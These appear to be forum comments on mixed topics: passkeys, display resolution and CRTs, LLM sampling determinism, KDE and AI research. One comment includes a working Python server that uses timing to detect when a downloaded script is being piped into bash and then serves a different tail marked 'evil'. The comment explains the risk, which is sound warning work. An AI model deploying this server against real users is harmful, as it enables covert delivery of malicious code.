Am I the exception? When thinking, I don't conceptualize things in words - the compression would be too lossy. Maybe because I'm fluent in three languages (one Germanic, one Romance, one Slavic)?
Our brains reason in many domains depending on the situation.
For domains built primarily on linguistic primitives (legal writing), we do often reason through language. In other domains (e.g. spatial reasoning), we reason through vision or sound.
We experience this distinction when we study the formula vs. the graph of a mathematical function: the former is linguistic, the latter visual-spatial.
And learning multiple spoken languages is a great way to break out of particularly rigid reasoning patterns and, just as important, to counter biases influenced by your native language.
How exactly is this "reducing the security level to those of passwords"? For example: you can't use a passkey on an attacker's web site even if you have a plaintext copy of the private key.
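Rough sketch of the idea (names are made up, and HMAC just stands in for the authenticator's real asymmetric signature): the signed blob includes the origin the browser actually saw, so the real site rejects an assertion produced on a phishing origin:

```python
import hashlib
import hmac
import json

# Conceptual sketch only: HMAC stands in for the authenticator's real
# asymmetric signature, and the field names only loosely mirror WebAuthn.
PRIVATE_KEY = b"the 'stolen' plaintext private key"

def authenticator_sign(origin: str, challenge: str) -> tuple[bytes, bytes]:
    # The browser/authenticator binds the signature to the origin it saw.
    client_data = json.dumps({"origin": origin, "challenge": challenge}).encode()
    sig = hmac.new(PRIVATE_KEY, hashlib.sha256(client_data).digest(),
                   hashlib.sha256).digest()
    return client_data, sig

def relying_party_verify(client_data: bytes, sig: bytes,
                         expected_origin: str, expected_challenge: str) -> bool:
    # The real site checks the origin embedded in the signed data first.
    data = json.loads(client_data)
    if data["origin"] != expected_origin or data["challenge"] != expected_challenge:
        return False  # signature may be valid, but it was made for another site
    expected = hmac.new(PRIVATE_KEY, hashlib.sha256(client_data).digest(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(sig, expected)

# Phishing scenario: the victim is on evil.example, so the signed blob says so.
cd, sig = authenticator_sign("https://evil.example", "challenge-from-real-site")
print(relying_party_verify(cd, sig, "https://real.example",
                           "challenge-from-real-site"))  # False
```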
And especially don't run the script while it's downloading. The remote server can detect the timing difference (say the script has "sleep 30" in it and the send buffer fills up) and serve a different response (really easy with chunked encoding or HTTP/2 data frames).
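Roughly like this on the server side (the port, payloads, and thresholds are made up, and it glosses over partial sends): push the script in chunks and watch whether the client keeps draining the socket; if it stalls on the sleep, it's being piped into a shell, so swap the tail:

```python
import socket

# Sketch only: payloads and thresholds are illustrative.
BENIGN_TAIL = b"echo install finished\n"
EVIL_TAIL = b"echo payload that only piped-to-bash clients ever receive\n"

def chunk(data: bytes) -> bytes:
    # Encode one HTTP/1.1 chunked-transfer chunk.
    return b"%x\r\n%s\r\n" % (len(data), data)

srv = socket.socket()
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("127.0.0.1", 8080))
srv.listen(1)
conn, _ = srv.accept()
conn.recv(4096)  # read and ignore the HTTP request
conn.sendall(b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n")

# A client that just downloads the script keeps reading; "curl | bash"
# executes this line immediately and stops draining the socket for 30s.
conn.sendall(chunk(b"sleep 30\n"))

stalled = False
conn.settimeout(2.0)
try:
    for _ in range(2000):                         # ~9 MB of filler comments,
        conn.sendall(chunk(b"# filler\n" * 512))  # enough to fill the TCP buffers
except socket.timeout:
    stalled = True                                # client stopped reading: it's executing
conn.settimeout(None)

conn.sendall(chunk(EVIL_TAIL if stalled else BENIGN_TAIL))
conn.sendall(b"0\r\n\r\n")
conn.close()
```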
Subpixel rendering works completely fine on Linux. I'm using it right now, with "full" hinting and "RGB" subpixel rendering. It even works completely fine with "non-integer" scaling in KDE, even in Firefox when "widget.wayland.fractional-scale.enabled" is enabled.
On the other hand, subpixel rendering is absent from macOS, which makes it very difficult to use regular ol' 1920x1080 screens with modern macOS. Yes, those Retina displays look nice, but it's a shame that lower-res screens don't, because they work perfectly fine except for the font rendering.
Hm... I am reading this on the 1600x900 screen of my T420s Frankenpad while sitting at dusk at a German campsite. I ordered the screen some 10 years ago off Alibaba or something, and it is exactly the resolution and brightness I need. I hope I will die before this Frankenpad, because contemporary laptops are awful in so many aspects.
You know... as you age, you really can't read all those tiny characters anyway.
> I think it's an amazing feat of marketing, by display companies, that people still put up with such low resolutions.
Stereo audio is still fine even though 5.1 exists
300 dpi printers are still usable even though 2400 dpi printers exist
double-glass windows are still fine even though triple-glass windows exist
2-wheel drive cars are still fine even though 4-wheel drive cars exist
Just because something new appears on the market, that new thing does not need to take over from all its predecessors when those predecessors are good enough for the intended purpose - especially not when the new thing comes with costs of its own: power use and higher demands on GPUs, in the case of displays with higher resolution than really needed.
We're animals that are perfectly fine living naked in the wild (some still do today). It's all complete excess. Feel free to abandon the progression of tech, but I challenge you to use a modern panel for a couple of months, then try to go back to 1080p. It's like the console players who claimed 30fps was serviceable. Fine, sure - but nobody wants to go back to 30fps after they've used 60Hz or 144Hz for a non-negligible amount of time.
I also use a 1080p display from time to time; it's serviceable, but it's not comfortable, and it provides a far, far inferior experience.
A Full HD CRT from the roadside in 2003? As if this was just a thing people had happen to them? Is this some elaborate joke I'm missing?
> I haven't owned a smartphone with a screen resolution that low
Smartphone in italics, because smartphones are known for their low pixel densities, right? What?
Did you own a smartphone at all in the past 10 years? Just double checking.
> I think it's an amazing feat of marketing, by display companies, that people still put up with such low resolutions.
And how did you reach that conclusion? Did you somehow miss display companies selling and pushing 1440p and 4K monitors left and right for more than a handful of years at this point, while the Steam Hardware Survey still shows 1080p monitors as the king month after month?
Sometimes I really do wonder if I live in a different world to others.
> As if this was just a thing people had happen to them?
No, literally, on the roadside, out for trash. Disposing of a CRT has always been expensive, since they don't fit in the trash and taking them to the dump carries a fee for all the lead. At the transition to LCD they were all over the place, along with projection TVs. There was also a lot of churn when "slimmer" versions came out that roughly halved the depth required. Again, it was literally 50 lbs and about 2 ft deep; it took up my whole desk. It was worthless to most anyone.
> Smartphone in italics, because smartphones are known for their low pixel densities, right? What?
Over 10 years ago I had an iPhone 6 Plus, with 1080p resolution. All my phones since then have been higher. Their pixel densities (DPI) are actually pretty great, but since they're small, their pixel counts are on the lower side. There's nothing different about smartphone displays: the display manufacturers use the same processes for all of them, with the same densities.
I think the italics are because it's so weird that most people have more pixels on the 6" display in their pocket than on the 24" display on their desk.
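Rough numbers, assuming a 5.5" phone and a 24" desktop monitor:

```python
import math

def ppi(width_px: int, height_px: int, diagonal_in: float) -> float:
    # Pixels per inch from resolution and diagonal size.
    return math.hypot(width_px, height_px) / diagonal_in

print(round(ppi(1920, 1080, 5.5)))   # ~401 ppi: iPhone 6 Plus class panel
print(round(ppi(1920, 1080, 24.0)))  # ~92 ppi: typical 24" desktop monitor
```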
No, it was limited by the bandwidth of the beam-driving system, which the manufacturers obviously tried to maximize. This limit is what set the shadow mask and the RGB subpixel/stripe widths. The electron beam couldn't make different colors; differently colored phosphor patches were used instead.
But, since bandwidth is mostly resolution * refresh, you could trade between the two: more refresh, less resolution; more resolution, less refresh. Early on you had to download a "driver" for the monitor, which had a list of the supported resolutions and refresh rates. Eventually a protocol was made to query the supported resolutions straight from the monitor. But you could also just make your own list (still can) and do funky resolutions and refresh rates, as long as the drive circuit could accommodate them.
This monitor could do something like 75Hz at 800x600, and I think < 60 at 1080p.
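To make the resolution-vs-refresh tradeoff concrete, a toy calculation with an assumed pixel budget (not this monitor's actual specs):

```python
# Toy numbers only: assume a fixed ~108 Mpixel/s of video bandwidth
# (blanking intervals ignored) and see how resolution trades against refresh.
PIXEL_BUDGET = 108_000_000  # pixels per second, an assumed figure

for w, h in [(800, 600), (1024, 768), (1280, 1024), (1600, 1200), (1920, 1080)]:
    print(f"{w}x{h}: up to ~{PIXEL_BUDGET / (w * h):.0f} Hz")
```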
I got a 21" Hitachi Superscan Elite or Supreme around that time from a gamer.
Because that thing could only do the BIOS text modes, and standard VGA at 640x480 at 60 or 70Hz. Anything else just showed OUT OF SYNC on the OSD, and then switched off.
Except when you fed it 800x600@160Hz, 1024x768@144Hz, 1280@120Hz and 1600x1200@70 to 80Hz, or anything weird in between.
I could easily do that under XFree86 or early X.Org. A gamer under DOS/Windows rather couldn't, not even with SciTech Display Doctor, because most games at that time used the hardware directly, with only a few standard options to choose from.
OUT-OF-SYNCzing
Was nice for viewing 2 DIN A4 pages side by side at original size :-)
Fortunately a Matrox I had could drive that, as could a later Voodoo3 which also had excellent RAMDACs and X support.
That sounds weird and fun, although I can't seem to find the pattern that would have resulted in those numbers. 1024×768@144 (8bpc) works out to 340 MB/s, while 800×600@160 (8bpc) works out to just 230 MB/s, so it should have been able to refresh even faster. Or is that some other limitation that's not bandwidth? [0]
Was a bit surprised by that double-A4 thing btw, but I did the math and it checks out - paper is just surprisingly small compared to desktop displays, both size- and resolution-wise (1612×1209 would have put you right at 96 ppi, with regular 1600×1200 being pretty close too). It's kind of ironic even: the typical 24" 1080p 60 Hz LCD spec that's been with us for decades now just barely fits an A4 height-wise, and has a slightly lower ppi. It does have some extra space for sidebars at least, I guess.
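The arithmetic, for anyone curious (assuming a 21" 4:3 tube and a 24" 16:9 panel):

```python
import math

MM_PER_INCH = 25.4
a4_w, a4_h = 210 / MM_PER_INCH, 297 / MM_PER_INCH  # 8.27" x 11.69"

# 21" 4:3 tube: width and height from the diagonal.
crt_w, crt_h = 21 * 0.8, 21 * 0.6           # 16.8" x 12.6"
print(int(crt_w * 96), int(crt_h * 96))     # 1612 x 1209 px for ~96 ppi
print(2 * a4_w <= crt_w and a4_h <= crt_h)  # True: two portrait A4 pages fit

# Typical 24" 16:9 1080p panel.
lcd_w = 24 * 16 / math.hypot(16, 9)         # ~20.9"
lcd_h = 24 * 9 / math.hypot(16, 9)          # ~11.8"
print(round(1920 / lcd_w))                  # ~92 ppi, a bit under 96
print(a4_h <= lcd_h)                        # True, but only just
```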
[0] Update: ah right, it wasn't the pixel clock being run to its limit there, but the horizontal frequency.
Those are the resolutions and frequencies I remember having tested without trouble. Indeed I could go even faster on the lower ones, but didn't dare to for long, because they sometimes produced very weird high-frequency noises, sometimes blurriness, and I didn't want to break that wonderful piece of kit.
Mostly cared about 1600x1200 at 75Hz back then. All that other stuff was just for demonstration purposes for other people coming by, or for watching videos fullscreen in PAL.
It really seemed to be made for that resolution at a reasonable frequency, with the BIOS & VGA modes implemented just so you could see it start up and change settings, and all the rest just a 'side effect'.
Yeah, DDC and EDID were standardized in '94, and were widely available and working well by '98 - if you were on Windows at least, running fresh hardware.
> This monitor could do something like 75Hz at 800x600, and I think < 60 at 1080p.
Assuming both modes were meant with 24-bit color ("true color"), that'd mean 17.36 Hz tops then for the FHD mode, ignoring video timing requirements. I don't think you were using that monitor at 17 Hz.
Even if you fell back to 16 bit color, that's still at most 26 Hz, which is miserable enough on a modern sample-and-hold style display, let alone on a strobed one from back in the day. And that is to say nothing of the mouse input feel.
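For reference, the arithmetic behind those figures:

```python
# Blanking intervals ignored, so the real numbers would be even lower.
budget = 800 * 600 * 75 * 3                  # bytes/s implied by 800x600@75 at 24-bit

print(round(budget / (1920 * 1080 * 3), 2))  # 17.36 Hz at 24-bit color
print(round(budget / (1920 * 1080 * 2), 2))  # 26.04 Hz falling back to 16-bit
```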
They still had very real limitations in terms of the signal they accepted, and color CRTs specifically had discrete color patches forming a discrete, fixed number of triads.
I had the same experience: none of my mentors knew what "dynamic programming" was, and our country-level competition (whose problems were inspired by the IOI) required dynamic programming for 2 out of 5 problems. And of course I failed the first time (2004). Then I learned what it was about and aced it the next time (2005).
The two parts of your statement don't go together. A list of potential output tokens and their probabilities is generated deterministically, but the actual token returned is then chosen at random (weighted based on the "temperature" parameter and the probability values).
I assume they use software-based pseudo-random-number generators. Those can typically be given a seed-value which determines (deterministically) the sequence of random numbers that will be generated.
So if an LLM uses a seedable pseudo-random-number-generator for its random numbers, then it can be fully deterministic.
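A minimal sketch of that sampling step (toy logits; NumPy's seeded generator standing in for whatever RNG a real serving stack uses):

```python
import numpy as np

def sample_token(logits: np.ndarray, temperature: float, seed: int) -> int:
    # Temperature-scaled softmax sampling with a seeded PRNG.
    rng = np.random.default_rng(seed)             # same seed -> same draws
    scaled = logits / max(temperature, 1e-8)
    probs = np.exp(scaled - scaled.max())
    probs /= probs.sum()
    return int(rng.choice(len(logits), p=probs))  # weighted random pick

logits = np.array([2.0, 1.5, 0.3, -1.0])          # toy "next token" scores
print(sample_token(logits, temperature=0.8, seed=42))
print(sample_token(logits, temperature=0.8, seed=42))  # identical result every run
```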
There are subtle sources of nondeterminism in concurrent floating point operations, especially on GPU. So even with a fixed seed, if an LLM encounters two tokens with very close likelihoods, it may pick one or the other across different runs. This has been observed even with temperature=0, which in principle does not involve _any_ randomness (see arXiv paper cited earlier in this thread).
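A tiny illustration of where that nondeterminism comes from: floating-point addition isn't associative, so a GPU reduction that happens to sum in a different order can nudge two near-tied logits past each other.

```python
# The grouping changes the result, so summing the same numbers in a
# different order (as parallel reductions do) gives different answers.
a, b, c = 1e20, -1e20, 0.1
print((a + b) + c)  # 0.1
print(a + (b + c))  # 0.0
```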
KDE is that. The two things I don't like about it are the spotty KIO integration with GTK apps (even with kio-fuse installed), and the lack of a D-Bus-based configuration system like gsettings/dconf.
Not sure if it's a NixOS bug, but even other KDE apps have hit-or-miss KIO integration for me; e.g. Krusader cannot open my MTP devices, while Dolphin can.
IMO, to be a good programmer you need a basic understanding of what a compiler does, what a build system does, what a normal processor does, what a SIMD processor does, what your runtime's concurrency model does, what your runtime's garbage collector does and when, and more (what your deployment orchestrator does, how your development environment differs from production...).
You don't need to understand how any of it works in detail, or how to build such a system yourself, but you need to know the basics.
Sure - we just need to learn to use the tools properly: Test Driven Development and/or well structured Software Engineering practices are proving to be a good fit.
If it's been indexed by a Web search engine, surely it's in a training dataset. The most popular Web search engines are the least efficient way of finding answers these days.
But just because it's in the training set doesn't mean the model retains the knowledge. It acquires information that is frequently mentioned, plus random tidbits of everything else. The rest can be compensated for with the 20 web searches models now get. That's great when you want a React dropdown, but for that detail that's mentioned in one Russian-speaking forum and can otherwise only be deduced by analysing the leaked Windows XP source code, AI will continue to struggle for a bit.
Of course, AI is incredibly useful both for reading foreign-language forums and for analysing complex code bases for original research. AI is great for supercharging traditional research.